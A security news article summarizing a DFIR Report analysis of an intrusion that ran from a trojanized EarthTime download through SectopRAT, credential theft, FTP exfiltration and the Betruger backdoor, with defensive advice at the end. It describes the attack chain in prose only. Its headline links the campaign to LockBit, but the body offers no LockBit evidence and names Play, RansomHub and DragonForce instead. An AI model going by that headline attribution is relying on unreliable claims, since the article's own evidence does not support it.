Intrusion Campaign Links BlackCat, LockBit, and BlackSuit Ransomware Gangs
The DFIR Report details an intrusion that connects three major ransomware operations—BlackCat/ALPHV, LockBit, and BlackSuit—through shared tooling and infrastructure.
An intrusion analyzed by The DFIR Report has revealed a campaign that blurs operational lines between three of the most prolific ransomware gangs: BlackCat/ALPHV, LockBit, and BlackSuit. The case, initially shared with customers in March 2025, demonstrates how affiliates or common access brokers may be leveraging shared infrastructure and toolkits to deploy different ransomware strains against the same victim.
The attack chain began in September 2024 when a user downloaded a malicious file masquerading as DeskSoft's EarthTime application. Instead of the legitimate timekeeping tool, the file deployed the SectopRAT remote access trojan, which established a foothold and a command-and-control (C2) tunnel via SystemBC proxy malware. The threat actor then escalated privileges by creating a new local account and granting it administrative rights, enabling lateral movement primarily through RDP connections.
Reconnaissance efforts were extensive, involving tools such as AdFind for Active Directory queries, SharpHound for directory mapping, SoftPerfect NetScan for host scanning, and Grixba—a reconnaissance utility previously tied to the Play ransomware group. Credential theft included a DCSync attack on a domain controller and PowerShell-based extraction of Veeam backup credentials. Data exfiltration was carried out by compressing targeted file shares with WinRAR and transferring the archives via WinSCP over unencrypted FTP to a US-based cloud provider, exposing credentials in transit.
On the sixth day of the intrusion, SectopRAT delivered the Betruger backdoor, a multi-function payload linked to RansomHub affiliates. However, the threat actor was evicted before any final ransomware payload was deployed. Despite this, investigators found multiple artifacts tying the operation to three distinct ransomware ecosystems: Grixba (Play/BlackSuit), Betruger (RansomHub/BlackCat), and network scans referencing a company previously hit by DragonForce ransomware.
The DFIR Report emphasizes that this case underscores the increasingly blurred boundaries between ransomware operations. Rather than a single monolithic group, the evidence points to a shared access broker or an affiliate who works across multiple gangs, deploying whichever ransomware variant suits the moment. This consolidation trend mirrors market data showing top ransomware groups capturing 71% of global attack share in early 2026.
No patches are applicable here, as the intrusion relied on credential theft and commodity malware rather than zero-day exploits. However, defenders are advised to monitor for the specific tools mentioned—SectopRAT, SystemBC, Betruger, and Grixba—and to enforce strong multifactor authentication, network segmentation, and strict monitoring of RDP and FTP traffic to detect similar cross-gang intrusions.
This case illustrates a critical shift in the ransomware landscape: the rise of a fluid affiliate ecosystem where threat actors freely mix tooling from competing gangs, making attribution less meaningful and response more complex.